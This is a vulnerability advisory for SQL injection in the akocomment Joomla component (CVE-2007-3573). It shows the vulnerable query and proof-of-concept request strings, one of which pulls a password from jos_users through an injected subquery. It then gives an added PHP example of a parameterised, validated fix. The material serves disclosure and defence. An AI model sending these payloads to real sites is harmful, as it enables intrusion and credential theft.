akocomment Multiple SQL Injection Vulnerabilities

Vulnerability ID: 1189963
Vulnerability type: SQL injection
Published: 2007-07-05
Updated: 2007-07-05
CVE ID: CVE-2007-3573
CNNVD-ID: CNNVD-200707-071
Platform: N/A
CVSS score: 6.8
|Vulnerability source
https://www.securityfocus.com/bid/81656
https://cxsecurity.com/issue/WLB-2007070015
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200707-071
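|Vulnerability details
akocomment contains multiple SQL injection vulnerabilities. A remote attacker can execute arbitrary SQL commands via the (1) acparentid or (2) acitemid parameter to an unspecified component. This vulnerability is different from CVE-2006-1421.
|Exploit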
$query2 = "INSERT INTO #__akocomment SET parentid='$acparentid',
contentid='$contentid', ip='$ip', name='$acname', title='$title',
comment='$comment', date='$date', published='$ac_autopublish';";

There are two SQL injections.

POC:

<INPUT TYPE='hidden' NAME='acitemid' value='9'><INPUT TYPE='hidden'
NAME='acparentid' value=''><INPUT TYPE='hidden' NAME='contentid'
value='633'>

acparentid=633 and acitemid=9

option=com_akocomment&acitemid=9&acparentid=&contentid=633&func=entry&ac
name=Visitatore&title=aa&comment=af&hid_security_word=db17bc578c383f5bb0
cb9be70c42331c&security_word=dsq

option=com_akocomment&hid_security_word=db17bc578c383f5bb0cb9be70c42331c
&security_word=dsq&acitemid=9&acparentid=633',contentid=9,ip='127.0.0.1'
,name='test',title='titolo',comment='commento',date=0,published=1/*

option=com_akocomment&hid_security_word=db17bc578c383f5bb0cb9be70c42331c
&security_word=dsq&acitemid=9&acparentid=633',contentid=9,ip='127.0.0.1'
,name=(select
top 1 password from
jos_users),title='titulo',comment='commento',date=0,published=1/*

It works only when magic quotes are off.

alpha fix: enable magic quotes.
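
Magic quotes were removed in PHP 5.4, so the lasting fix for the query above is to validate the numeric parameters and bind every value instead of concatenating it. The following PHP is an added example, not akocomment's or the advisory author's code; the `jos_akocomment` table layout, the function names and the sample requests are assumptions constructed for illustration, and the same `require_id` check applies to `acitemid`.

```php
<?php
declare(strict_types=1);
// Added example, not akocomment's code; table layout and function names are assumptions.
/** Return a request value as a non-negative integer ID, or throw. */
function require_id(array $req, string $key): int
{
    $raw = $req[$key] ?? '';
    if ($raw === '') {
        return 0; // empty acparentid in the page's form = top-level comment
    }
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 0]]);
    if ($id === false) {
        throw new InvalidArgumentException("$key must be a non-negative integer");
    }
    return $id;
}

/** Insert a comment with every value bound, never concatenated into the SQL. */
function insert_comment(PDO $db, array $req, string $ip): int
{
    $stmt = $db->prepare(
        'INSERT INTO jos_akocomment (parentid, contentid, ip, name, title, comment, date, published)
         VALUES (:parentid, :contentid, :ip, :name, :title, :comment, :date, :published)'
    );
    $stmt->execute([
        ':parentid'  => require_id($req, 'acparentid'),
        ':contentid' => require_id($req, 'contentid'),
        ':ip'        => $ip,
        ':name'      => (string)($req['acname'] ?? ''),
        ':title'     => (string)($req['title'] ?? ''),
        ':comment'   => (string)($req['comment'] ?? ''),
        ':date'      => date('Y-m-d H:i:s'),
        ':published' => 0, // stand-in for the $ac_autopublish setting, never request data
    ]);
    return (int)$db->lastInsertId();
}
$db = new PDO('sqlite::memory:'); // in-memory stand-in for the site database
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE jos_akocomment (id INTEGER PRIMARY KEY, parentid INTEGER,
    contentid INTEGER, ip TEXT, name TEXT, title TEXT, comment TEXT, date TEXT, published INTEGER)');
// Constructed requests: benign (quote in the name) and one with a quote-breaking acparentid.
$benign  = ['acparentid' => '', 'contentid' => '633', 'acname' => "O'Brien", 'title' => 'aa', 'comment' => 'af'];
$hostile = ['acparentid' => "633',published=1/*"] + $benign;
echo 'inserted row ', insert_comment($db, $benign, '127.0.0.1'), PHP_EOL;
try {
    insert_comment($db, $hostile, '127.0.0.1');
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}
```

The benign request is stored with its apostrophe intact because the value is bound, while the malformed `acparentid` is rejected before any statement executes.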
|Affected products
Akocomment Akocomment 0
|References

Source: BUGTRAQ
Name: 20070629akocommentSQLINJECTION(allversion)
Link: http://www.securityfocus.com/archive/1/archive/1/472652/100/0/threaded
Source: OSVDB
Name: 38914
Link: http://osvdb.org/38914
Source: SREASON
Name: 2860
Link: http://securityreason.com/securityalert/2860